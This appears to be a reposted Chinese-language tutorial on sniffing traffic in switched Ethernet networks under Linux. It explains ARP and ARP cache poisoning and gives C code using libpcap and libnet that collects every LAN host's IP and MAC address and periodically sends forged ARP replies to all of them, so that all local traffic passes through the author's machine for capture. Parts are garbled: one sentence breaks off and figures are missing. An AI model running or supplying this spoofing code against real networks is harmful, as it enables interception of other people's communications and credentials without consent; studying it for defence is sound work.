交換型網絡環境嗅探原理及LINUX下的實現

2019-11-05 01:53:36

字體：大中小

來源：轉載

供稿：網友

　　1. 以太網嗅探原理
　　
　　以太網環境下的嗅探本身是比較簡單的，只要網卡能設置成混雜模式且有數據包到達網卡，則可用多種方法捕捉數據包并進行各種協議分析。在linux下可用RAW套接字，SOCK_PACKET套接字， LIBPCAP函數包等方法捕捉數據包，典型的應用程序如TCPDUMP， LINUX_SNIFFER等。
　　
　　在共享型以太網中，上述兩個條件顯然是滿足的。所有的主機都連接到HUB，而HUB對數據包傳輸形式是廣播。這意味著發給某個主機的數據包也會被其它所有主機的網卡所收到。因此在這樣的環境中，任何設置成混雜模式的主機，都可以捕捉發送給其它主機的數據包，從而竊聽網絡上的所有通信。
　　
　　在交換型以太網中，上述條件2是不滿足的。所有的主機連接到SWITCH，SWITCH比HUB更聰明，它知道每臺計算機的MAC地址信息和與之相連的特定端口，發給某個主機的數據包會被SWITCH從特定的端口送出，而不是象HUB那樣，廣播給網絡上所有的機器。這種傳輸形式使交換型以太網的性能大大提高，同時還有一個附加的作用：使傳統的嗅探器無法工作。
　　
　　綜上所述，交換型網絡環境嗅探的核心問題是：如何使本不應到達的數據包到達本地。通常的方法有MAC洪水包和ARP欺騙。其中MAC洪水包是向交換機發送大量含有虛構MAC地址和　　
　　2. 相關協議數據包格式
　　
　　以太數據包格式：
　　　

　　類型0800 ：IP數據包
　　類型0806 ：ARP數據包
　　ARP數據包格式：
　　　

　　ARP數據包簡化格式
　　為了論述的簡潔性，我們把ARP數據包格式做一些簡化。目的端MAC地址源MAC地址 ARP包類型發送端MAC地址發送端IP地址目的端MAC地址目的端IP地址
　　
　　3. 實驗環境
　　
　　為了更清楚的描述交換網絡的嗅探原理，我們建立一個虛構的交換網絡環境，在下面的論述中將用到這些數據.
　　　

　　4. ARP協議原理
　　
　　在以太網中傳輸的數據包是以太包，而以太包的尋址是依據其首部的物理地址（MAC地址）。僅僅知道某主機的邏輯地址（IP地址）并不能讓內核發送一幀數據給此主機，內核必須知道目的主機的物理地址才能發送數據。ARP協議的作用就是在于把邏輯地址變換成物理地址，也既是把32bit的IP地址變換成48bit的以太地址。
　　
　　每一個主機都有一個ARP高速緩存，此緩存中記錄了最近一段時間內其它IP地址與其MAC地址的對應關系。假如本機想與某臺主機通信，則首先在ARP高速緩存中查找此臺主機的IP和MAC信息，假如存在，則直接利用此MAC地址構造以太包；假如不存在，則向本網絡上每一個主機廣播一個ARP請求包，其意義是"假如你有此IP地址，請告訴我你的MAC地址"，目的主機收到此請求包后，發送一個ARP響應包，本機收到此響應包后，把相關信息記錄在ARP高速緩存中，以下的步驟同上。
　　
　　可以看出，ARP協議是有缺點的，第三方主機可以構造一個ARP欺騙包，而源主機卻無法分辨真假。
　　
　　5. ARP欺騙原理
　　
　　假設B(2.2.2.2)要與A(1.1.1.1)通信，且B的ARP高速緩存中沒有關于A的MAC信息，則B發出ARP請求包。
　　　

　　此時，B的ARP高速緩存中關于A的記錄為(1.1.1.1 <-- --> 04:04:04)，則B向A發IP包實際上是發到我的主機(4.4.4.4，04:04:04)。同理，假如我進一步欺騙A，讓A的ARP高速緩存中關于B的記錄為(2.2.2.2 <-- --> 04:04:04)，則A向B發IP包實際上也是發到我的主機(4.4.4.4，04:04:04)。最后，我讓本機打開數據包轉發，也既是充當路由器，則A，B之間能正常通信，但我能全部捕捉到相關數據。
　　
　　以上討論的是欺騙兩臺主機，假如我能讓局域網中每一臺主機的ARP高速緩存中關于其它任意一個主機所對應的MAC地址都為我的MAC地址(04:04:04:04)，則本局域網中所有數據包我都能捕捉到!
　　
　　6. 程序設計思路
　　
　　使用到的函數包
　　libpcap : 捕捉ARP數據包。
　　libnet : 獲得本機的MAC地址和IP地址；構造和發送ARP欺騙包。
　　這兩個的函數包的使用在網上資料很多，本文中不介紹。
　　
　　主要數據結構
　　程序中有兩個全局變量，MYIP代表本機的IP地址，MYMAC代表本機的MAC地址。
　　程序中維護一個存放主機信息的鏈表：
　　
　　
　　typedef strUCt host HOST;
　　struct host
　　{
　　 unsigned long　ip;　　　　　　　// IP地址
　　 unsigned char　mac[6];　　　　　// MAC地址
　　int mac_flag;　 //　0：MAC為空，1：MAC不為空
　　 HOST　* next;
　　}；
　　
　　
　　
　　
　　把握本局域網中每一臺主機的IP地址和MAC地址信息。
　　利用libpcap捕捉網絡中的ARP請求/應答包，最大限度的提取相關信息。如在第五節中的B對A的ARP請求包，我們可以提取出關于B的完整信息（2.2.2.2，02:02:02），也獲得了關于A的部分信息（1.1.1.1，null）。在知道網絡中有主機A的情況下，我們可以構造并發送對A的ARP請求包，捕捉A的ARP應答包，從而完整把握A的信息。同理，我們也可以捕捉TCP/UDP等數據包，從中提取信息。
　　創建一個向鏈表增加主機信息的函數：add_host(ip，mac)，每收到一個ARP請求/應答包，都執行add_host( )兩次：add_host(發送端IP，發送端MAC)，add_host(目的端IP，目的端MAC)。
　　在收到ARP應答包時，首先檢查發送端的IP和MAC，假如IP不是自己的，但MAC是自己的，則說明此應答包是本機構造的ARP欺騙包，程序忽略。
　　對于正常的ARP請求包和應答包，add_host(ip， mac )中IP或MAC只要有一個是自己的(ip == MYIP mac ==MYMAC)，則程序忽略。顯然，沒有必要自己欺騙自己。
　　add_host(ip，mac)遍歷主機鏈表，假如IP存在，且MAC不空，則把MAC地址寫入；假如不存在，則增加一個HOST節點，寫入IP地址，假如MAC不空，則也把MAC地址寫入。注重到這樣一個情況：在ARP請求包中，目的MAC地址是沒有意義的，所以我們只寫入IP地址，而MAC地址用NULL來表示。這是我們收集網絡拓樸結構的一種被動方法。
　　
　　函數add_host( )邏輯設計MYIP = IP(d)，MYMAC = MAC(d)
　　

　　代碼如下：
　　
　　
　　void add_host(u_long ip, u_char * mac)
　　{
　　 HOST * new = NULL;
　　 HOST * cur = NULL;
　　
　　 if( (ip == MYIP) (mac && mac_equal(mac, MYMAC)) )
　　 return;
　　
　　 //遍歷鏈表查詢IP地址
　　 for(cur = head; cur; cur = cur->next)
　　 {
　　 if( ip == cur->ip )
　　 {
　　 if( mac )　// MAC地址不空，則寫入
　　 {
　　 memcpy(cur->mac, mac, ETHER_ADDR_LEN);
　　 cur->mac_flag = 1;
　　 }
　　 return;
　　 }
　　 }
　　 if(cur == NULL)　// 鏈表中沒有此IP地址
　　 {
　　 new = (HOST *)malloc(sizeof(HOST));
　　 new->ip = ip;
　　 if( mac )
　　 {
　　 memcpy(new->mac, mac, ETHER_ADDR_LEN);
　　 new->mac_flag = 1;
　　 }
　　 else
　　 new->mac_flag = 0;
　　 new->next = NULL;
　　 if(! head)　　 // 把新節點加入鏈表
　　 {
　　 head = new;
　　 tail = new;
　　 }
　　 else
　　 {
　　 tail->next = new;
　　 tail = new;
　　 }　
　　 }
　　 return;
　　}
　　
　　
　　
　　
　　周期性的向局域網中每一臺主機發送ARP欺騙包。
　　創建一個發送ARP欺騙包的函數send_fake_arp_packet()，遍歷主機鏈表的每一個IP地址，假如此IP地址的MAC地址已知，則遍歷主機鏈表中其它IP地址，以其它IP地址和本機的MAC地址為發送端，以選中的IP地址和MAC地址為目的端，構造并發送ARP應答欺騙包；假如此IP地址的MAC地址未知，則以本機IP地址和MAC地址為發送端，以選中的IP地址為目的端，構造并發送正常的ARP請求包。注重，這是我們收集網絡拓樸結構的一種主動方法。
　　ARP高速緩存中的記錄都有過期時間，不同的操作系統有不同的設置.在實施中，我們只需以較短的時間周期性的發ARP欺騙包，則可解決這個問題.
　　代碼如下：
　　
　　
　　 void send_fake_arp_packet()
　　{
　　 HOST * temp, * cur;
　　 u_char broad[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
　　
　　for(cur = head; cur ; cur = cur->next)
　　 {
　　
　　if( cur->mac_flag == 0)　
　　{
　　// 構造ARP請求包請求此IP地址的MAC地址
　　 libnet_build_ethernet(broad, MYMAC, ETHERTYPE_ARP, NULL, 0, packet);
　　 libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REQUEST,
　　 MYMAC, (u_char *)&MYIP, (u_char *)broad,(u_char *)&cur->ip, NULL, 0, (packet + LIBNET_ETH_H));
　　 if((libnet_write_link_layer(netif, device, packet, (LIBNET_ETH_H + LIBNET_ARP_H))) < 0)
　　 errexit("libnet_write_link_layer error/n");
　　
　　 continue;
　　 }
　　 for(temp = head; temp; temp = temp->next)
　　 {
　　 if (temp == cur)
　　 continue;
　　
　　 libnet_build_ethernet(cur->mac, MYMAC, ETHERTYPE_ARP, NULL, 0, packet);
　　 libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REPLY,
　　 MYMAC, (u_char *)&temp->ip, cur->mac,(u_char *)&cur->ip, NULL, 0, (packet + LIBNET_ETH_H));
　　 if((libnet_write_link_layer(netif, device, packet, (LIBNET_ETH_H + LIBNET_ARP_H))) < 0)
　　 errexit("libnet_write_link_layer error/n");
　　 }
　　 }
　　}
　　
　　
　　
　　正確處理一個以太包實際被捕捉兩次的情況。例如：捕捉到B發向A的以太包，第一次為（2.2.2.2，02:02:02）->(1.1.1.1，04:04:04)，第二次為(2.2.2.2，04:04:04)->(1.1.1.1，01:01:01)。區分這兩次捕捉的規則很簡單：目標IP 不為本IP且目標MAC為本MAC就是第一次；源IP不為本IP且源MAC為本MAC就是第二次。在實際處理中，可任取一種包并把源/目的MAC改寫，對另一種包忽略即可。
　　7. 相關說明
　　
　　這種ARP欺騙是以主機的ARP高速緩存可以動態改變為前提的，假如ARP高速緩存中某一IP的MAC地址被設為靜態(static)，則對關于此IP的欺騙是顯然不成立的。
　　為了盡快的把握網絡中主機的地址信息，應至少對ARP請求包和ARP應答包都處理。假如只處理ARP請求包，則在此刻只能把握發端主機的信息，并只能欺騙發端主機。在實際的IP包捕捉中，就會看到單邊數據包。當然，在程序運行一段時間后，所有主機信息也能全部把握，但效率顯然是不高的。假如再加上對未知MAC的IP的主動請求，則捕捉所有數據包可在較短時間內完成。（在實際的C類網中測試，不到一分鐘）

上一篇：LAPB、X.25和X.25交換配置命令

下一篇：3Com SuperStack3 Switch4200系列交換機中文電子手抄本